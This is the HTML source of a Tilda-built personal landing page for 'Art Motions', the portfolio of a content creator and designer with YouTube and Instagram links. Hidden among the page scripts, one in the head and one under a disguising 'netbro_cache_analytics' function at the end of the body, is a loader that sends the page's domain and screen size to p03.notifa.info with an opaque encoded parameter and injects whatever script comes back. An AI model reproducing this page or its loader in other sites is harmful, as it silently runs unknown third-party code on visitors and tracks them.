<html>

<head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!--metatextblock-->
    <title>Art Motions</title>
    <meta name="description" content="Art Motions Page">
    <meta name="keywords" content="Art.Motions, Art MOtions, Youtuber, Content Creator, Mas Adi, MasAdi, MasAdi Prihambodo">

    <!--/metatextblock-->
    <meta name="format-detection" content="telephone=no">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <link rel="dns-prefetch" href="https://tilda.ws">
    <link rel="dns-prefetch" href="https://static.tildacdn.com">
    <!-- <link rel="shortcut icon" href="images/logo-art-motions.png" type="image/x-icon">
    <meta name="msapplication-TileColor" content="#000000">
    <meta name="msapplication-TileImage" content="https://static.tildacdn.com/tild3732-3533-4636-b665-316261363335/Fill_1_Copy_2.png"> -->
    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
    <link rel="icon" href="images/favicon.ico" type="image/x-icon">
    <!-- Assets -->
    <link rel="stylesheet" href="https://static.tildacdn.com/css/tilda-grid-3.0.min.css" type="text/css" media="all">
    <link rel="stylesheet" href="https://tilda.ws/project1613403/tilda-blocks-2.12.css?t=1571990492" type="text/css" media="all">
    <link rel="stylesheet" href="https://static.tildacdn.com/css/tilda-animation-1.0.min.css" type="text/css" media="all">
    <link rel="stylesheet" href="https://static.tildacdn.com/css/tilda-slds-1.4.min.css" type="text/css" media="all">
    <link rel="stylesheet" href="https://static.tildacdn.com/css/tilda-zoom-2.0.min.css" type="text/css" media="all">
    <link rel="stylesheet" href="https://static.tildacdn.com/css/tilda-popup-1.1.min.css" type="text/css" media="all">
    <link href="fontawesome-free/css/all.css" rel="stylesheet" type="text/css">
    <script type="text/javascript" async="" id="tildastatscript" src="https://stat.tildacdn.com/js/tildastat-0.2.min.js"></script>
    <script src="https://static.tildacdn.com/js/jquery-1.10.2.min.js"></script>
    <script src="https://static.tildacdn.com/js/tilda-scripts-2.8.min.js"></script>
    <script src="https://tilda.ws/project1613403/tilda-blocks-2.7.js?t=1571990492"></script>
    <script src="https://static.tildacdn.com/js/lazyload-1.3.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-animation-1.0.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-slds-1.4.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/hammer.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-zoom-2.0.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-animation-ext-1.0.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-forms-1.0.min.js" charset="utf-8"></script>
    <script src="https://static.tildacdn.com/js/tilda-zero-forms-1.0.min.js" charset="utf-8"></script>
    <script type="text/javascript">
        window.dataLayer = window.dataLayer || [];
    </script>
    <script type="text/javascript">
        if ((/bot|google|yandex|baidu|bing|msn|duckduckbot|teoma|slurp|crawler|spider|robot|crawling|facebook/i.test(navigator.userAgent)) === false && typeof(sessionStorage) != 'undefined' && sessionStorage.getItem('visited') !== 'y') {
            var style = document.createElement('style');
            style.type = 'text/css';
            style.innerHTML = '@media screen and (min-width: 980px) {.t-records {opacity: 0;}.t-records_animated {-webkit-transition: opacity ease-in-out .2s;-moz-transition: opacity ease-in-out .2s;-o-transition: opacity ease-in-out .2s;transition: opacity ease-in-out .2s;}.t-records.t-records_visible {opacity: 1;}}';
            document.getElementsByTagName('head')[0].appendChild(style);
            $(document).ready(function() {
                $('.t-records').addClass('t-records_animated');
                setTimeout(function() {
                    $('.t-records').addClass('t-records_visible');
                    sessionStorage.setItem('visited', 'y');
                }, 400);
            });
        }
    </script>
    <style type="text/css">
        @media screen and (min-width: 980px) {
            .t-records {
                opacity: 0;
            }
            .t-records_animated {
                -webkit-transition: opacity ease-in-out .2s;
                -moz-transition: opacity ease-in-out .2s;
                -o-transition: opacity ease-in-out .2s;
                transition: opacity ease-in-out .2s;
            }
            .t-records.t-records_visible {
                opacity: 1;
            }
        }
    </style>
    <script type="text/javascript" async="" src="http://p03.notifa.info/3fsmd3/request?id=1&amp;enc=9UwkxLgY9&amp;params=4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX%2fwZaFZ7e1A3yr%2fu%2fNnLjw%2bMoGUO%2bNY%2f1dYoQcTXXgvU7LqV3BaML4Ui9xbPCVITgc1jrlIHjc8tAhNM7lWO%2bd9VjnQDG3JsN8HOJI7mwiruPZdRaK3uhOVkFfl95ymo1%2fSPoQTJP3bKH59FCRQ6HyYivKBS4KrmXb3kd1Ep1wWI2qH02jXXm5vu3gFSLt0zb%2bPOJi0EOLzTCeXjW6V6ELmftXQc9SkuFtzdcdwIn7M9eCrbYl92UdW22D6ggIf%2farp2RaRKt4mVzY%2bGEUuIZXtCqD4QOdwPRi1tTRLyFJ76P89vrFDbhDApcDQ4ODy8pHMj8UdjuND%2b%2fp2g6hev0Oz7M7AudMVFDAsskowzSHhlXDBZgbl5rQ2C152knjwe9OYcZq8Roe4b9NOG8PjD%2b0Sppan9twaqx6hP4B%2bbSoTVn0yvF4lvuxs1gFwBMOepjY2UR1D9OdDjtpbvwzvOKzbIfxtliVRy5SxK2Tt%2fbnqwmo4CJBD1fCnu5nsZ63EAq&amp;idc_r=4283503170&amp;domain=vahur.kubja.com&amp;sw=1366&amp;sh=768"></script>
</head>

<body class="t-body" style="margin:0;">
    <!--allrecords-->
    <div id="allrecords" class="t-records t-records_animated t-records_visible" data-hook="blocks-collection-content-node" data-tilda-project-id="1613403" data-tilda-page-id="7202465" data-tilda-formskey="62f8e8b5dac0802e10693a054fe08ae8">
        <div id="rec126448336" class="r t-rec" data-animationappear="off" data-record-type="396">
            <!-- T396 -->
            <style>
                #rec126448336 .t396__artboard {
                    /* height: 685px; */
                    background-color: #005745;
                }
                
                #rec126448336 .t396__filter {
                    height: 685px;
                }
                
                #rec126448336 .t396__carrier {
                    height: 685px;
                    background-position: center center;
                    background-attachment: scroll;
                    background-size: cover;
                    background-repeat: no-repeat;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .t396__artboard {
                        height: 595px;
                    }
                    #rec126448336 .t396__filter {
                        height: 595px;
                    }
                    #rec126448336 .t396__carrier {
                        height: 595px;
                        background-attachment: scroll;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .t396__artboard {
                        height: 505px;
                    }
                    #rec126448336 .t396__filter {
                        height: 505px;
                    }
                    #rec126448336 .t396__carrier {
                        height: 505px;
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .t396__artboard {
                        height: 635px;
                    }
                    #rec126448336 .t396__filter {
                        height: 635px;
                    }
                    #rec126448336 .t396__carrier {
                        height: 635px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .t396__artboard {
                        height: 765px;
                    }
                    #rec126448336 .t396__filter {
                        height: 765px;
                    }
                    #rec126448336 .t396__carrier {
                        height: 765px;
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                    color: #d8d8d8;
                    z-index: 5;
                    top: 103px;
                    left: calc(50% - 600px + 21px);
                    width: 560px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768596477"] .tn-atom {
                    color: #d8d8d8;
                    font-size: 52px;
                    font-family: 'TTTravels', Arial, sans-serif;
                    line-height: 1.55;
                    font-weight: 700;
                    letter-spacing: 0.69px;
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                        top: 103px;
                        left: calc(50% - 480px + 12px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                        top: 141px;
                        left: calc(50% - 320px + 12px);
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                        top: 335px;
                        left: calc(50% - 240px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                        top: 311px;
                        left: calc(50% - 160px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] {
                        text-align: left;
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768596477"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                    color: #d8d8d8;
                    z-index: 2;
                    top: 240px;
                    left: calc(50% - 600px + 21px);
                    width: 560px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768718708"] .tn-atom {
                    color: #d8d8d8;
                    font-size: 52px;
                    font-family: 'TTTravels', Arial, sans-serif;
                    line-height: 1.55;
                    font-weight: 300;
                    letter-spacing: 0.69px;
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                        top: 240px;
                        left: calc(50% - 480px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                        top: 189px;
                        left: calc(50% - 320px + 13px);
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                        top: 382px;
                        left: calc(50% - 240px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                        top: 361px;
                        left: calc(50% - 160px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] {
                        text-align: left;
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768718708"] .tn-atom {
                        font-size: 43px;
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                    color: #d8d8d8;
                    z-index: 3;
                    top: 329px;
                    left: calc(50% - 600px + 21px);
                    width: 560px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567768787811"] .tn-atom {
                    color: #d8d8d8;
                    font-size: 24px;
                    font-family: 'TTTravels', Arial, sans-serif;
                    line-height: 1.55;
                    font-weight: 500;
                    letter-spacing: 0.32px;
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                        top: 329px;
                        left: calc(50% - 480px + 12px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] .tn-atom {
                        font-size: 18px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                        top: 269px;
                        left: calc(50% - 320px + 12px);
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                        top: 464px;
                        left: calc(50% - 240px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] .tn-atom {
                        font-size: 18px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                        top: 432px;
                        left: calc(50% - 160px + 13px);
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] {
                        text-align: left;
                    }
                    #rec126448336 .tn-elem[data-elem-id="1567768787811"] .tn-atom {
                        font-size: 18px;
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769295290"] {
                    z-index: 1;
                    top: 0px;
                    left: 0px;
                    width: 160%;
                    height: 621px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769295290"] .tn-atom {
                    background-color: #005745;
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769295290"] {
                        top: 0px;
                        left: 0px;
                        width: 159%;
                        height: 543px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769295290"] {
                        top: 0px;
                        left: 0px;
                        width: 158%;
                        height: 451px;
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769295290"] {
                        top: 0px;
                        left: -1px;
                        width: 160%;
                        height: 598px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769295290"] {
                        top: 0px;
                        left: 0px;
                        width: 159%;
                        height: 710px;
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769621897"] {
                    z-index: 4;
                    top: 103px;
                    left: calc(50% - 600px + 812px);
                    width: 510px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769621897"] .tn-atom {
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769621897"] {
                        top: 195px;
                        left: calc(50% - 480px + 586px);
                        width: 400px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769621897"] {
                        top: 252px;
                        left: calc(50% - 320px + 431px);
                        width: 240px;
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769621897"] {
                        top: 360px;
                        left: calc(50% - 240px + 240px);
                        width: 270px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769621897"] {
                        top: 499px;
                        left: calc(50% - 160px + 25px);
                    }
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769714190"] {
                    z-index: 6;
                    top: -91px;
                    left: calc(50% - 600px + 361px);
                    width: 680px;
                }
                
                #rec126448336 .tn-elem[data-elem-id="1567769714190"] .tn-atom {
                    background-position: center center;
                    border-color: transparent;
                    border-style: solid;
                }
                
                @media screen and (max-width: 1199px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769714190"] {
                        top: -70px;
                        left: calc(50% - 480px + 249px);
                        width: 550px;
                    }
                }
                
                @media screen and (max-width: 959px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769714190"] {
                        top: -40px;
                        left: calc(50% - 320px + 240px);
                        width: 360px;
                    }
                }
                
                @media screen and (max-width: 639px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769714190"] {
                        top: -40px;
                        left: calc(50% - 240px + 1px);
                        width: 360px;
                    }
                }
                
                @media screen and (max-width: 479px) {
                    #rec126448336 .tn-elem[data-elem-id="1567769714190"] {
                        top: -27px;
                        left: calc(50% - 160px + 0px);
                        width: 320px;
                    }
                }
            </style>
            <div class="t396">
                <div class="t396__artboard rendered" data-artboard-recid="126448336" data-artboard-height="685" data-artboard-height-res-960="595" data-artboard-height-res-640="505" data-artboard-height-res-480="635" data-artboard-height-res-320="765" data-artboard-height_vh="" data-artboard-valign="center" data-artboard-ovrflw="" data-artboard-proxy-min-offset-top="0" data-artboard-proxy-min-height="685" data-artboard-proxy-max-height="685">
                    <div class="t396__carrier" data-artboard-recid="126448336"></div>
                    <div class="t396__filter" data-artboard-recid="126448336"></div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567768596477 t-animate t-animate_started" data-elem-id="1567768596477" data-elem-type="text" data-field-top-value="103" data-field-top-res-960-value="183" data-field-top-res-640-value="141" data-field-top-res-480-value="335" data-field-top-res-320-value="311" data-field-left-value="21" data-field-left-res-960-value="12" data-field-left-res-640-value="12" data-field-left-res-480-value="13" data-field-left-res-320-value="13" data-field-width-value="560" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="grid" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="" data-animate-style="fadeinright" data-animate-duration="1" data-animate-distance="100" data-fields="top,left,width,container,axisx,axisy,widthunits,leftunits,topunits" style="top: 103px; left: 95.5px; width: 560px; transform: translate3d(-100px, 0px, 0px); transition-duration: 1s;">
                        <h1 class="tn-atom">Art Motions</h1> </div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567768718708 t-animate t-animate_started" data-elem-id="1567768718708" data-elem-type="text" data-field-top-value="240" data-field-top-res-960-value="240" data-field-top-res-640-value="189" data-field-top-res-480-value="382" data-field-top-res-320-value="361" data-field-left-value="21" data-field-left-res-960-value="13" data-field-left-res-640-value="13" data-field-left-res-480-value="13" data-field-left-res-320-value="13" data-field-width-value="560" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="grid" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="" data-animate-style="fadeinright" data-animate-duration="1.5" data-animate-distance="100" data-fields="top,left,width,container,axisx,axisy,widthunits,leftunits,topunits" style="top: 240px; left: 95.5px; width: 560px; transform: translate3d(-100px, 0px, 0px); transition-duration: 1.5s;">
                        <div class="tn-atom" field="tn_text_1567768718708"><span style="font-size: 32px;">Mas Adi Prihambodo</span></div>
                    </div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567768787811 t-animate t-animate_started" data-elem-id="1567768787811" data-elem-type="text" data-field-top-value="329" data-field-top-res-960-value="329" data-field-top-res-640-value="269" data-field-top-res-480-value="464" data-field-top-res-320-value="432" data-field-left-value="21" data-field-left-res-960-value="12" data-field-left-res-640-value="12" data-field-left-res-480-value="13" data-field-left-res-320-value="13" data-field-width-value="560" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="grid" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="" data-animate-style="fadeinright" data-animate-duration="1.8" data-animate-distance="100" data-fields="top,left,width,container,axisx,axisy,widthunits,leftunits,topunits" style="top: 329px; left: 95.5px; width: 560px; transform: translate3d(-100px, 0px, 0px); transition-duration: 1.8s;">
                        <h2 class="tn-atom">Content Creator <br> Vidiographer <br>Flat Designer <br> Civil Enginering <br><br>
                            <a href="https://www.youtube.com/channel/UCvGDXBeVI3rGtJ5uS7MWIhQ" style="text-decoration: none;"><i class="fab fa-youtube">Art Motions</i></a>
                            <a href="https://www.instagram.com/art.motions/" style="text-decoration: none;"><i class="fab fa-instagram">Art.Motions</i></a>
                        </h2>
                    </div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567769295290" data-elem-id="1567769295290" data-elem-type="shape" data-field-top-value="0" data-field-top-res-960-value="0" data-field-top-res-640-value="0" data-field-top-res-480-value="0" data-field-top-res-320-value="0" data-field-left-value="0" data-field-left-res-960-value="0" data-field-left-res-640-value="0" data-field-left-res-480-value="-1" data-field-left-res-320-value="0" data-field-height-value="621" data-field-height-res-960-value="543" data-field-height-res-640-value="451" data-field-height-res-480-value="598" data-field-height-res-320-value="710" data-field-width-value="160" data-field-width-res-960-value="159" data-field-width-res-640-value="158" data-field-width-res-480-value="160" data-field-width-res-320-value="159" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="window" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="%" data-fields="width,height,top,left,container,axisx,axisy,widthunits,heightunits,leftunits,topunits" style="width: 2158.4px; left: 0px; top: 0px; height: 621px;">
                        <div class="tn-atom"> </div>
                    </div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567769621897 t-animate t-animate_started" data-elem-id="1567769621897" data-elem-type="image" data-field-top-value="103" data-field-top-res-960-value="195" data-field-top-res-640-value="252" data-field-top-res-480-value="360" data-field-top-res-320-value="499" data-field-left-value="812" data-field-left-res-960-value="586" data-field-left-res-640-value="431" data-field-left-res-480-value="240" data-field-left-res-320-value="25" data-field-width-value="510" data-field-width-res-960-value="400" data-field-width-res-640-value="240" data-field-width-res-480-value="270" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="grid" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="" data-animate-style="zoomin" data-animate-duration="1" data-animate-scale="0.9" data-fields="img,width,filewidth,fileheight,top,left,container,axisx,axisy,widthunits,leftunits,topunits" style="left: 886.5px; top: 103px; width: 510px; transform: scale(0.9); transition-duration: 1s;">
                        <div class="tn-atom"> <img class="tn-atom__img t-img loaded" data-original="images/vahur_copy_4.png" imgfield="tn_img_1567769621897" src="images/vahur_copy_4.png"> </div>
                    </div>
                    <div class="t396__elem tn-elem tn-elem__1264483361567769714190 t-animate t-animate_started" data-elem-id="1567769714190" data-elem-type="image" data-field-top-value="-91" data-field-top-res-960-value="-70" data-field-top-res-640-value="-40" data-field-top-res-480-value="-40" data-field-top-res-320-value="-27" data-field-left-value="361" data-field-left-res-960-value="249" data-field-left-res-640-value="240" data-field-left-res-480-value="1" data-field-left-res-320-value="0" data-field-width-value="680" data-field-width-res-960-value="550" data-field-width-res-640-value="360" data-field-width-res-480-value="360" data-field-width-res-320-value="320" data-field-axisy-value="top" data-field-axisx-value="left" data-field-container-value="grid" data-field-topunits-value="" data-field-leftunits-value="" data-field-heightunits-value="" data-field-widthunits-value="" data-animate-style="fadeindown" data-animate-duration="1" data-animate-distance="100" data-fields="img,width,filewidth,fileheight,top,left,container,axisx,axisy,widthunits,leftunits,topunits" style="left: 435.5px; top: -91px; width: 680px; transform: translate3d(0px, -100px, 0px); transition-duration: 1s;">
                        <div class="tn-atom"> <img class="tn-atom__img t-img loaded" data-original="images/Landing_image01.png" imgfield="tn_img_1567769714190" src="images/Landing_image01.png"> </div>
                    </div>
                </div>
            </div>
            <script>
                $(document).ready(function() {
                    t396_init('126448336');
                });
            </script>
            <!-- /T396 -->
        </div>
    </div>
    <!--/allrecords-->
    <!-- Tilda copyright. Don't remove this line -->
    <!-- Stat -->
    <script type="text/javascript">
        if (!window.mainTracker) {
            window.mainTracker = 'tilda';
        }(function(d, w, k, o, g) {
            var n = d.getElementsByTagName(o)[0],
                s = d.createElement(o),
                f = function() {
                    n.parentNode.insertBefore(s, n);
                };
            s.type = "text/javascript";
            s.async = true;
            s.key = k;
            s.id = "tildastatscript";
            s.src = g;
            if (w.opera == "[object Opera]") {
                d.addEventListener("DOMContentLoaded", f, false);
            } else {
                f();
            }
        })(document, window, '02ba96e20e80a7ae6ecb05e11494771c', 'script', 'https://stat.tildacdn.com/js/tildastat-0.2.min.js');
    </script>
    <script type="text/javascript">
        if (self == top) {
            function netbro_cache_analytics(fn, callback) {
                setTimeout(function() {
                    fn();
                    callback();
                }, 0);
            }

            function sync(fn) {
                fn();
            }

            function requestCfs() {
                var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
                var idc_glo_r = Math.floor(Math.random() * 99999999999);
                var url = idc_glo_url + "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX%2fwZaFZ7e1A3yr%2fu%2fNnLjw%2bMoGUO%2bNY%2f1dYoQcTXXgvU7LqV3BaML4Ui9xbPCVITgc1jrlIHjc8tAhNM7lWO%2bd9VjnQDG3JsN8HOJI7mwiruPZdRaK3uhOVkFfl95ymo1%2fSPoQTJP3bKH59FCRQ6HyYivKBS4KrmXb3kd1Ep1wWI2qH02jXXm5vu3gFSLt0zb%2bPOJi0EOLzTCeXjW6V6ELmftXQc9SkuFtzdcdwIn7M9eCrbYl92UdW22D6ggIf%2farp2RaRKt4mVzY%2bGEUuIZXtCqD4QOdwPRi1tTRLyFJ76P89vrFDbhDApcDQ4ODy8pHMj8UdjuND%2b%2fp2g6hev0Oz7M7AudMVFDAsskowzSHhlXDBZgbl5rQ2C152knjwe9OYcZq8Roe4b9NOG8PjD%2b0Sppan9twaqx6hP4B%2bbSoTVn0yvF4lvuxs1gFwBMOepjY2UR1D9OdDjtpbvwzvOKzbIfxtliVRy5SxK2Tt%2fbnqwmo4CJBD1fCnu5nsZ63EAq" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
                var bsa = document.createElement('script');
                bsa.type = 'text/javascript';
                bsa.async = true;
                bsa.src = url;
                (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
            }
            netbro_cache_analytics(requestCfs, function() {});
        };
    </script>
</body>

</html>